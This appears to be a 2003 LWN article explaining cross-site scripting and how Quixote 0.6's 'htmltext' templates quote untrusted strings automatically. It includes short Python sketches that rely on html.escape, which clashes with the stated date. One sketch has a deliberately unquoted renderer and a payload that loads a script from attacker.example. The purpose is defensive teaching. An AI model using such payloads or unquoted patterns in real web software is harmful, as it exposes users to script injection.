Closing off cross-site scripting holes
[Posted January 15, 2003 by corbet]
When writing web applications, it is easy to lose track of the fact that
HTML is not quite the same as plain text. As a result, erroneous
characters (such as an unescaped "&") can easily slip into a web
page. They can result in poorly rendered pages, RSS files that fail to
load, and lots of email suggesting that the author buy and read a copy of
"HTML for drooling morons." Trust us, we know.
As annoying as that sort of problem can be, it fades into insignificance
when compared to the other issue that arises when text is treated as if it
were HTML: cross-site scripting. If an outside attacker can get your web
application to present arbitrary HTML to another user, that attacker can
often get the victim to disclose information or carry out an unwanted
action. Cross-site scripting problems have afflicted many applications,
and they are unlikely to go away anytime soon. It is just too easy for a
web application programmer to slip up and let unquoted text through.
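To make the problem concrete, here is a minimal Python sketch of such a hole. The render_comment function and the attacker's URL are hypothetical, made up for illustration; nothing here is taken from a real application.

```python
# Hypothetical page fragment builder that treats user text as if it were HTML.
def render_comment(author, body):
    # BUG: author and body are pasted into the markup without any quoting.
    return "<p><b>%s</b> wrote: %s</p>" % (author, body)

# Text submitted by an attacker; the URL is a placeholder.
hostile = '<script src="http://attacker.example/steal.js"></script>'

page = render_comment("mallory", hostile)
print(page)
```

The script tag arrives in the victim's browser intact, where it is treated as part of the page rather than as a comment to be displayed.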
Version 0.6 of the Quixote web
application framework, which saw its first beta release last week, includes an
interesting approach to the cross-site scripting problem. Quixote (which
is the framework used by LWN) includes a nice "template" feature which
allows an easy and natural mixing of HTML text and Python code. Text
generated by a template is passed back to the web browser as an HTML
document.
In the current Quixote release, as in most web frameworks, text is sent
directly back without processing or quoting. After all, web templates need
to be able to include HTML tags in their output, and things would not work
very well if those tags were quoted. Quixote provides a function for the
safe quoting of untrusted text, but the programmer must remember to use it
in all the relevant places. Sooner or later, most programmers forget.
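The manual discipline looks something like the following sketch. It uses html.escape from the Python standard library as a stand-in for the framework's quoting function; the render_profile function and its fields are invented for illustration.

```python
from html import escape  # stand-in for a framework-provided quoting function

def render_profile(name, bio):
    # The programmer remembered to quote the name...
    out = "<h1>%s</h1>\n" % escape(name)
    # ...but forgot the bio, so this line is a cross-site scripting hole.
    out += "<p>%s</p>\n" % bio
    return out

page = render_profile("A & B", "<script>alert(1)</script>")
print(page)
```

Nothing complains about the unquoted bio; the page simply renders, which is why omissions of this kind tend to survive.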
Version 0.6, instead, has two kinds of text. Anything which appears as a
string literal in the template source is of type "htmltext," and it is assumed to be
exactly as the programmer wanted it to be (since he or she wrote it that
way). Anything which takes the form of an ordinary Python string, however,
is assumed to need quoting on its way to the browser; this quoting happens
automatically as the template is executed.
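The two-kinds-of-text idea can be sketched in a few lines of Python. This is not Quixote's implementation; the HtmlText class and quote function below are hypothetical names, and html.escape from the standard library is assumed as the quoting primitive. The sketch only handles "%s" substitutions.

```python
from html import escape


class HtmlText:
    """Markup the programmer wrote; trusted, and never quoted again."""

    def __init__(self, markup):
        self.markup = markup

    def __str__(self):
        return self.markup

    def __add__(self, other):
        # Trusted markup is kept as is; anything else is quoted first.
        return HtmlText(self.markup + quote(other).markup)

    def __radd__(self, other):
        # Reached for "plain string" + HtmlText; the plain string is quoted.
        return HtmlText(quote(other).markup + self.markup)

    def __mod__(self, args):
        # Quote every substituted value before formatting (%s only).
        if not isinstance(args, tuple):
            args = (args,)
        return HtmlText(self.markup % tuple(quote(a).markup for a in args))


def quote(value):
    """Return value as HtmlText, escaping it unless it is already trusted."""
    if isinstance(value, HtmlText):
        return value
    return HtmlText(escape(str(value)))


template = HtmlText("<p>Hello, %s!</p>")     # written by the programmer
untrusted = "<script>alert(1)</script>"      # ordinary string from outside
page = template % untrusted
print(page)  # <p>Hello, &lt;script&gt;alert(1)&lt;/script&gt;!</p>
```

The programmer never calls quote directly here; combining an ordinary string with trusted markup is what triggers the quoting.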
The result is that text that comes from a database or other external source
is automatically quoted, and thus cannot be used for a cross-site
scripting attack. The programmer no longer needs to worry about quoting
every bit of text that passes through the application. This is, of course,
the way things should be done from a security standpoint: assume that
everything is suspect in the absence of an explicit statement to the
contrary. This approach, too, can create bugs - HTML tags may end up being
quoted when they should be passed through directly. But that kind of bug
is immediately evident, while a failure to quote is usually invisible -
until it bites you. The new Quixote HTML template mechanism errs on the
side of security and makes failures happen in the right way.
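The difference between the two failure modes can be sketched with html.escape from the Python standard library; the variable names are illustrative only.

```python
from html import escape

trusted_markup = "<b>Breaking news</b>"       # written by the programmer
hostile_input = "<script>alert(1)</script>"   # supplied by an outsider

# Failure one: trusted markup is quoted by mistake. The browser displays the
# literal characters "<b>Breaking news</b>", so the bug is obvious on sight.
over_quoted = escape(trusted_markup)

# Failure two: hostile input is not quoted. The page looks normal to its
# author, and the script runs in the victim's browser.
under_quoted = hostile_input

print(over_quoted)   # &lt;b&gt;Breaking news&lt;/b&gt;
print(under_quoted)
```

The first mistake gets noticed and fixed the first time somebody looks at the page; the second may go unnoticed until somebody exploits it.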